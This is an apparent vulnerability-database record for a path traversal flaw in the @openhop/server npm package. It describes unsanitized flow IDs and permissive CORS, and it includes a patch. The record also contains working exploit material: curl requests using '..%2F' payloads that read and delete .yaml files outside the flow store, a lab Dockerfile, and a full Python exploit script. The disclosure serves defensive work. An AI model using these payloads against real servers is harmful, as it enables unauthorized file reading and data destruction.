{"id":"CVE-2026-59179","aliases":[],"url":"https://o3.security/vulnerability/CVE-2026-59179","summary":"@openhop/server: Path Traversal in Flow ID File Operations","details":"## Path Traversal in Flow ID File Operations\n\n### Summary\n\n`@openhop/server` passes unsanitized HTTP route parameters directly to `path.join()` when constructing filesystem paths for flow YAML files. An unauthenticated attacker who can reach the server can read arbitrary `.yaml` files accessible to the OpenHop process outside the configured flow directory, and can delete arbitrary `.yaml` files at any path reachable by the process. Because CORS is set to `origin: true` (allow all origins), a victim's browser can be used to exploit the vulnerability against a loopback-bound instance. Docker deployments bind `HOST=0.0.0.0` by default, enabling direct remote exploitation. CVSS Base Score: **8.3 (High)**.\n\n### Details\n\n`FlowStore.filePath()` in `packages/server/src/store.ts:52–53` constructs a filesystem path by concatenating the caller-supplied `id` directly into `path.join`:\n\n```ts\n// packages/server/src/store.ts:52-53\nprivate filePath(id: string): string {\n  return join(this.dir, `${id}.yaml`)\n}\n```\n\nThis result is consumed by two sinks:\n\n- **Read** (`packages/server/src/store.ts:78`): `readFile(this.filePath(id), 'utf-8')`\n- **Delete** (`packages/server/src/store.ts:105`): `unlink(this.filePath(id))`\n\nThe `id` value originates from unauthenticated Fastify HTTP route parameters:\n\n- `GET /api/flows/:id` (`packages/server/src/routes.ts:306`) → `store.get(id)` at line 333–335\n- `DELETE /api/flows/:id` (`packages/server/src/routes.ts:509`) → `store.delete(id)` at line 539–541\n\nThe route parameter schema at `packages/server/src/routes.ts:315` and `519` declares only `type: 'string'` with no pattern constraint or allowlist. Fastify's underlying router (`find-my-way`) applies `decodeURIComponent` to route parameters, so the URL segment `..%2Fvictim` is decoded to `../victim` before it reaches application code. Node.js `path.join('/data/flows', '../victim.yaml')` then normalizes to `/data/victim.yaml`, escaping the configured data directory.\n\nAdditionally, `packages/server/src/index.ts:37` registers CORS with `origin: true`, permitting any browser origin to make cross-origin requests to the server. This makes the vulnerability exploitable via a malicious webpage against users running OpenHop locally.\n\n**Full data-flow (read path):**\n\n1. HTTP `GET /api/flows/..%2Fvictim` received (`routes.ts:306`)\n2. `find-my-way` decodes `..%2Fvictim` → `req.params.id = '../victim'` (`routes.ts:333`)\n3. `store.get('../victim')` → `filePath('../victim')` → `join('/data/flows', '../victim.yaml')` → `/data/victim.yaml` (`store.ts:52–53`)\n4. `readFile('/data/victim.yaml', 'utf-8')` returns file contents (`store.ts:78`)\n5. Server responds HTTP 200 with YAML-parsed JSON body\n\n**Full data-flow (delete path):**\n\n1. HTTP `DELETE /api/flows/..%2Fdelete-me` received (`routes.ts:509`)\n2. `find-my-way` decodes `..%2Fdelete-me` → `req.params.id = '../delete-me'` (`routes.ts:539`)\n3. `store.delete('../delete-me')` → `filePath('../delete-me')` → `join('/data/flows', '../delete-me.yaml')` → `/data/delete-me.yaml` (`store.ts:52–53`)\n4. `unlink('/data/delete-me.yaml')` removes the file (`store.ts:105`)\n5. Server responds HTTP 204\n\n### PoC\n\n**Environment setup (Docker):**\n\n```bash\n# Build from repository root\ndocker build -f vuln-001/Dockerfile -t openhop-vuln-001 .\n\n# Run with HOST=0.0.0.0 (default in the Dockerfile ENV)\ndocker run -d --name openhop-vuln-001 -p 8799:8799 openhop-vuln-001\n```\n\nThe container creates `/data/flows/` as the configured flow store (`OPENHOP_DATA_DIR=/data/flows`) and places `/data/victim.yaml` and `/data/delete-me.yaml` outside that directory as traversal targets.\n\n**Attack 1 — Read file outside flow store:**\n\n```bash\ncurl -i --path-as-is 'http://127.0.0.1:8799/api/flows/..%2Fvictim'\n```\n\nExpected response:\n\n```http\nHTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8\n\n{\"id\":\"victim\",\"meta\":{\"title\":\"SECRET_OUTSIDE_FILE\",\"description\":\"This file lives outside the configured flow store directory\"},\"flow\":{\"nodes\":[{\"id\":\"a\",\"label\":\"Sensitive Data\",\"type\":\"service\"}]},\"version\":1,\"createdAt\":\"2026-06-20T00:00:00.000Z\",\"updatedAt\":\"2026-06-20T00:00:00.000Z\"}\n```\n\n**Attack 2 — Delete file outside flow store:**\n\n```bash\ncurl -i -X DELETE --path-as-is 'http://127.0.0.1:8799/api/flows/..%2Fdelete-me'\n```\n\nExpected response:\n\n```http\nHTTP/1.1 204 No Content\n```\n\nVerify deletion:\n\n```bash\ndocker exec openhop-vuln-001 sh -c 'test -e /data/delete-me.yaml && echo exists || echo deleted'\n# Output: deleted\n```\n\n**Automated PoC script:**\n\n```bash\npython3 poc.py 127.0.0.1 8799\n```\n\n**Recommended fix:**\n\n```diff\n--- a/packages/server/src/store.ts\n+++ b/packages/server/src/store.ts\n+const FLOW_ID_PATTERN = /^[A-Za-z0-9_-]+$/\n+\n   private filePath(id: string): string {\n+    if (!FLOW_ID_PATTERN.test(id)) {\n+      throw new Error('Invalid flow id')\n+    }\n     return join(this.dir, `${id}.yaml`)\n   }\n```\n\n### Impact\n\nThis is a **Path Traversal (CWE-22)** vulnerability. The `.yaml` file extension restriction limits confidentiality impact to YAML-format files (C:L), but the delete path allows permanent destruction of any `.yaml` file the process can reach (I:H, A:H).\n\n**Affected parties:**\n\n- **Users running `openhop serve` locally** — exploitable via a malicious webpage due to `cors({ origin: true })` allowing all browser origins to make cross-origin requests to `localhost:8799`.\n- **Docker/server deployments** — `HOST=0.0.0.0` is set by default in the official Docker environment, making all three routes directly reachable from the network without authentication.\n\nAn attacker can: (1) read the contents of any `.yaml` file accessible to the OpenHop process, potentially leaking application secrets, configuration data, or other YAML-serialized data; (2) permanently delete any `.yaml` file accessible to the process, causing data loss or disruption of services that depend on those files.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\n# Dockerfile for VULN-001: Path Traversal in OpenHop Flow ID File Operations (CWE-22)\n#\n# Build context: the repository root (naorsabag/openhop)\n# Usage:\n#   docker build -f vuln-001/Dockerfile -t openhop-vuln-001 .\n#   docker run -d --name openhop-vuln-001 -p 8799:8799 openhop-vuln-001\n#\n# Data layout inside the container:\n#   /data/flows/         <- OPENHOP_DATA_DIR (the configured flow store)\n#   /data/victim.yaml    <- OUTSIDE the flow store (path traversal read target)\n#   /data/delete-me.yaml <- OUTSIDE the flow store (path traversal delete target)\n#\n# The exploit payload \"..%2Fvictim\" is URL-decoded by find-my-way to \"../victim\",\n# so path.join('/data/flows', '../victim.yaml') resolves to /data/victim.yaml.\n\nFROM node:22-alpine\n\nWORKDIR /app\n\n# Copy package manifests so npm can resolve workspace dependency graph.\nCOPY package*.json ./\nCOPY packages/server/package*.json packages/server/\nCOPY packages/shared/package*.json packages/shared/\nCOPY packages/cli/package*.json packages/cli/\nCOPY packages/web/package*.json packages/web/\n\n# Copy TypeScript configs and source files BEFORE npm install.\n# The @openhop/server package has a \"prepare\" lifecycle that runs\n# `tsc && esbuild` during npm install, so all sources must be present.\nCOPY tsconfig.base.json ./\nCOPY packages/server/tsconfig*.json packages/server/\nCOPY packages/server/src/ packages/server/src/\nCOPY packages/shared/src/ packages/shared/src/\n\n# Install all workspace dependencies.\n# The @openhop/server prepare script will compile to dist/server.js.\n# We run the server via tsx (direct TypeScript), so the compiled output\n# is not required at runtime but the prepare step must not fail.\nRUN npm install\n\n# Set up the data directory layout for the PoC.\n#   /data/flows/       -> configured as OPENHOP_DATA_DIR (the \"safe\" directory)\n#   /data/victim.yaml  -> outside the store; represents a sensitive file that\n#                         MUST NOT be reachable via the API without sanitization\nRUN mkdir -p /data/flows && \\\n    printf 'id: victim\\nversion: 1\\ncreatedAt: \"2026-06-20T00:00:00.000Z\"\\nupdatedAt: \"2026-06-20T00:00:00.000Z\"\\nroot:\\n  meta:\\n    title: SECRET_OUTSIDE_FILE\\n    description: This file lives outside the configured flow store directory\\n  flow:\\n    nodes:\\n      - id: a\\n        label: Sensitive Data\\n' \\\n    > /data/victim.yaml && \\\n    printf 'id: delete-me\\nversion: 1\\ncreatedAt: \"2026-06-20T00:00:00.000Z\"\\nupdatedAt: \"2026-06-20T00:00:00.000Z\"\\nroot:\\n  meta:\\n    title: DELETE_TARGET_FILE\\n  flow:\\n    nodes:\\n      - id: b\\n        label: Delete Target\\n' \\\n    > /data/delete-me.yaml\n\n# Server listens on 8799 inside the container.\nEXPOSE 8799\n\n# OPENHOP_DATA_DIR constrains the flow store to /data/flows/.\n# HOST=0.0.0.0 makes the server reachable from outside the container.\nENV OPENHOP_DATA_DIR=/data/flows\nENV HOST=0.0.0.0\nENV PORT=8799\n\n# Run the server via tsx (TypeScript runner; no compile step needed at runtime).\nCMD [\"npx\", \"tsx\", \"packages/server/src/index.ts\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC: Path Traversal in OpenHop Flow ID File Operations (CWE-22)\nTarget: @openhop/server 0.3.5 / openhop CLI 0.3.6\nVULN-001 — CVSS 8.3 High\n\nVulnerability:\n    FlowStore.filePath(id) at packages/server/src/store.ts:52 performs:\n        return join(this.dir, `${id}.yaml`)\n    with no sanitization on `id`. The route GET /api/flows/:id passes\n    `req.params.id` (decoded by find-my-way via decodeURIComponent) directly\n    to store.get(id), which calls filePath(). A payload of \"..%2Fvictim\" in\n    the URL is decoded to \"../victim\", causing path.join to escape the\n    configured data directory.\n\nAttack Vectors:\n    READ:   GET    /api/flows/..%2Fvictim    -> reads  /data/victim.yaml\n    DELETE: DELETE /api/flows/..%2Fdelete-me -> deletes /data/delete-me.yaml\n\nBoth routes are unauthenticated (routes.ts:306, 509).\n\nUsage:\n    python3 poc.py [host] [port]\n    python3 poc.py 127.0.0.1 8799\n\"\"\"\n\nimport http.client\nimport json\nimport sys\nimport time\n\nHOST = sys.argv[1] if len(sys.argv) > 1 else \"127.0.0.1\"\nPORT = int(sys.argv[2]) if len(sys.argv) > 2 else 8799\n\n# URL-encoded payloads: %2F is a percent-encoded \"/\" character.\n# find-my-way treats \"..\" and \"%2F\" together as a single path segment\n# (no literal \"/\" split), then decodes the segment to \"../victim\".\nTRAVERSAL_GET_PATH = \"/api/flows/..%2Fvictim\"\nTRAVERSAL_DELETE_PATH = \"/api/flows/..%2Fdelete-me\"\n\n\ndef wait_for_server(host: str, port: int, timeout: int = 60) -> bool:\n    \"\"\"Poll until the OpenHop server returns any response on /api/flows.\"\"\"\n    deadline = time.time() + timeout\n    print(f\"[*] Waiting for server at http://{host}:{port} ...\")\n    while time.time() < deadline:\n        try:\n            conn = http.client.HTTPConnection(host, port, timeout=2)\n            conn.request(\"GET\", \"/api/flows\")\n            r = conn.getresponse()\n            r.read()\n            conn.close()\n            print(f\"[+] Server ready (HTTP {r.status} on /api/flows)\")\n            return True\n        except Exception:\n            time.sleep(1)\n    return False\n\n\ndef raw_http(method: str, host: str, port: int, path: str):\n    \"\"\"\n    Send an HTTP request with the path exactly as given — no normalization.\n    http.client does NOT percent-decode or normalize the path string, so\n    '..%2F' reaches the server verbatim and Fastify's router decodes it.\n    \"\"\"\n    conn = http.client.HTTPConnection(host, port, timeout=10)\n    conn.request(method, path)\n    resp = conn.getresponse()\n    body = resp.read()\n    conn.close()\n    return resp.status, body\n\n\ndef main() -> int:\n    print(\"=\" * 62)\n    print(\"VULN-001  Path Traversal in OpenHop Flow ID File Operations\")\n    print(\"=\" * 62)\n    print(f\"[*] Target  : http://{HOST}:{PORT}\")\n    print(f\"[*] Payload : ..%2F  (decoded by find-my-way to ../)\")\n    print(f\"[*] Store   : /data/flows/   (OPENHOP_DATA_DIR)\")\n    print(f\"[*] Outside : /data/victim.yaml  /data/delete-me.yaml\")\n    print()\n\n    if not wait_for_server(HOST, PORT):\n        print(\"[-] Server did not become ready within timeout. ABORT.\")\n        return 1\n\n    print()\n    passed_read = False\n    passed_delete = False\n\n    # ── Attack 1: Read a file outside the configured flow store ─────────\n    print(\"[*] Attack 1 — READ path traversal\")\n    print(f\"    Request : GET {TRAVERSAL_GET_PATH}\")\n    print(f\"    Decoded : id = ../victim\")\n    print(f\"    Resolves: path.join('/data/flows', '../victim.yaml')\")\n    print(f\"            = /data/victim.yaml  (outside flow store)\")\n\n    status, body = raw_http(\"GET\", HOST, PORT, TRAVERSAL_GET_PATH)\n    body_text = body.decode(\"utf-8\", errors=\"replace\")\n\n    print(f\"    Status  : {status}\")\n    print(f\"    Body    : {body_text[:600]}\")\n\n    if status == 200:\n        try:\n            data = json.loads(body_text)\n            title = data.get(\"meta\", {}).get(\"title\", \"\")\n            if \"SECRET_OUTSIDE_FILE\" in title:\n                print(\"[PASS] READ confirmed: HTTP 200 returned content of /data/victim.yaml\")\n                print(f\"       Leaked title field = {title!r}\")\n                passed_read = True\n            else:\n                print(f\"[WARN] HTTP 200 but unexpected title: {title!r}\")\n                print(f\"       Full response: {data}\")\n                # Still count as read-traversal success if we got a valid flow back\n                if \"meta\" in data or \"flow\" in data:\n                    print(\"[PASS] READ confirmed: path traversal returned a flow from outside store\")\n                    passed_read = True\n        except json.JSONDecodeError:\n            print(f\"[FAIL] HTTP 200 but response is not JSON: {body_text[:200]}\")\n    else:\n        print(f\"[FAIL] Expected HTTP 200, got {status}\")\n\n    print()\n\n    # ── Attack 2: Delete a file outside the configured flow store ────────\n    print(\"[*] Attack 2 — DELETE path traversal\")\n    print(f\"    Request : DELETE {TRAVERSAL_DELETE_PATH}\")\n    print(f\"    Decoded : id = ../delete-me\")\n    print(f\"    Resolves: path.join('/data/flows', '../delete-me.yaml')\")\n    print(f\"            = /data/delete-me.yaml  (outside flow store)\")\n\n    status, body = raw_http(\"DELETE\", HOST, PORT, TRAVERSAL_DELETE_PATH)\n    body_text = body.decode(\"utf-8\", errors=\"replace\")\n\n    print(f\"    Status  : {status}\")\n    if body_text:\n        print(f\"    Body    : {body_text[:200]}\")\n\n    if status in (200, 204):\n        print(f\"[PASS] DELETE confirmed: HTTP {status} — /data/delete-me.yaml deleted outside store\")\n        passed_delete = True\n    else:\n        print(f\"[FAIL] Expected HTTP 204, got {status}\")\n\n    # ── Summary ─────────────────────────────────────────────────────────\n    print()\n    print(\"=\" * 62)\n    if passed_read and passed_delete:\n        print(\"[RESULT] PASS — Both read and delete path traversal exploited\")\n        return 0\n    elif passed_read:\n        print(\"[RESULT] PARTIAL — Read traversal confirmed, delete did not succeed\")\n        return 1\n    else:\n        print(\"[RESULT] FAIL — Exploit did not succeed\")\n        return 2\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```","published":"2026-09-09T23:51:59Z","modified":"2026-09-10T00:10:58.205429Z","cvss":{"score":8.3,"severity":"HIGH","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H"},"epss":null,"cisaKev":null,"exploitsKnown":null,"affectedPackages":[{"ecosystem":"npm","name":"@openhop/server","fixedVersion":"0.3.6"}],"fix":{"url":"https://github.com/naorsabag/openhop/commit/c8190fbefa3a50e7b0c16c001d2e05b0e920cfb4","label":"naorsabag/openhop@c8190fb"},"references":[{"type":"WEB","url":"https://github.com/naorsabag/openhop/security/advisories/GHSA-g72f-jw3w-mgh7"},{"type":"WEB","url":"https://github.com/naorsabag/openhop/commit/c8190fbefa3a50e7b0c16c001d2e05b0e920cfb4"},{"type":"PACKAGE","url":"https://github.com/naorsabag/openhop"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-09-10T00:10:58.205429Z"}}